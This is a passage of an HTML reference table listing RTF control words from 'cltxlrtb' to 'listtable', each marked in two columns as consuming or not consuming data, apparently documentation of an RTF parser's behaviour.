<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxlrtb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxlrtbv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxtbrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cltxtbrlv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvertalb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvertalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvertalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvmgf</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">clvmrg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmaindarkone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmaindarktwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmainlightone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cmainlighttwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">collapsed</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">colorschememapping</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">colortbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">comment</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">company</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">contextualspace</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">creatim</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ctextone</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ctexttwo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ctrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">cvmme</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">datafield</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">datastore</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">date</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dbch</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">defchp</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">defformat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">defpap</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">defshp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dgmargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dgsnap</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dntblnsbdb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">do</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dobxcolumn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobxmargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobxpage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobymargin</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobypage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dobypara</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">doccomm</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">doctemp</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">docvar</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dolock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowcomments</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowinsdel</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowmarkup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">donotshowprops</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpaendhol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpaendsol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dparc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dparcflipx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dparcflipy</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpastarthol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpastartsol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcallout</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcoaccent</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcobestfit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcoborder</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodabs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodbottom</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodcenter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcodtop</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcominusx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcominusy</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcosmarta</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcotdouble</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcotright</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcotsingle</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpcottriple</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpellipse</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpendgroup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpfillbgpal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpfillfgpal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpgroup</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedado</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedadodo</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedash</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinedot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinehollow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinepal</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dplinesolid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dppolygon</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dppolyline</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dprect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dproundr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dpshadow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxbtlr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxbx</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxbxtext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">dptxlrtb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxlrtbv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxtbrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">dptxtbrlv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ebcend</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ebcstart</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">emfblip</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">enddoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">endnhere</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">endnotes</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">expshrtn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">faauto</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">facenter</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">facingp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">factoidname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fafixed</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fahang</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">falt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">faroman</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">favar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbidi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbidis</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbimajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fbiminor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fchars</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fdbmajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fdbminor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fdecor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">felnbrelev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fetch</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffdeftext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffentrymcr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffexitmcr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffformat</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffhelptext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ffstattext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fhimajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fhiminor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">field</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">file</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">filetbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fjgothic</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fjminchou</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fldalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">flddirty</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldedit</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldinst</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fldlock</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldpriv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fldrslt</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fldtype</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">flomajor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">flominor</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fmodern</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fname</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fnetwork</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fnonfilesys</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fontemb</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fontfile</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">fonttbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footer</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footerf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footerl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footerr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">footnote</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">forceupgrade</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">formdisp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">formfield</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">formprot</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">formshade</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fracwidth</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxbtlr</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxlrtb</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxlrtbv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxtbrl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">frmtxtbrlv</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">froman</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fromtext</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fscript</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fswiss</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftech</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftfalsetype</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftnalt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnbj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftncn</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftnil</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnlytwnine</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnalc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnauc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnchi</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnchosung</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnncnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbar</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnndbnumt</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnganada</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnum</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnumd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnumk</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnngbnuml</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnrlc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnruc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnzodiac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnzodiacd</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnnzodiacl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnrestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnrstcont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnrstpg</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ftnsep</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftnsepc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">ftntj</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvaliddos</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvalidhpfs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvalidmac</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">fvalidntfs</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">g</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">generator</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">gridtbl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">gutterprl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">header</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">headerf</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">headerl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">headerr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hich</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">hl</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlfr</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlinkbase</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlloc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hlsrc</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">horzdoc</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">horzsect</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">hrule</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hsv</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">htmautsp</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">htmlbase</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">htmltag</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">hwelev</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">indmirror</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">indrlsweleven</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">info</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">intbl</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">ixe</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jclisttab</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jcompress</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jexpand</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jis</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jpegblip</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">jsksu</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keep</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keepn</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keycode</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">keywords</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">krnprsnet</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">landscape</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lastrow</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">latentstyles</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">lchars</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">levelnumbers</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">levelpicturenosize</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">leveltext</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">lfolevel</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">linebetcol</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linecont</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">lineppage</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linerestart</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linkself</th>
<td>Does not consume data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">linkstyles</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">linkval</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">list</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listhybrid</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">listlevel</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listname</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listoverride</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listoverridestartat</th>
<td>Does not consume data</td>
<td>Does not consume data</td>
</tr>
<tr>
<th scope="row">listoverridetable</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listpicture</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">liststylename</th>
<td class="consumer">Consumes data</td>
<td class="consumer">Consumes data</td>
</tr>
<tr>
<th scope="row">listtable</th>
<td class="consumer">Consumes data</td>
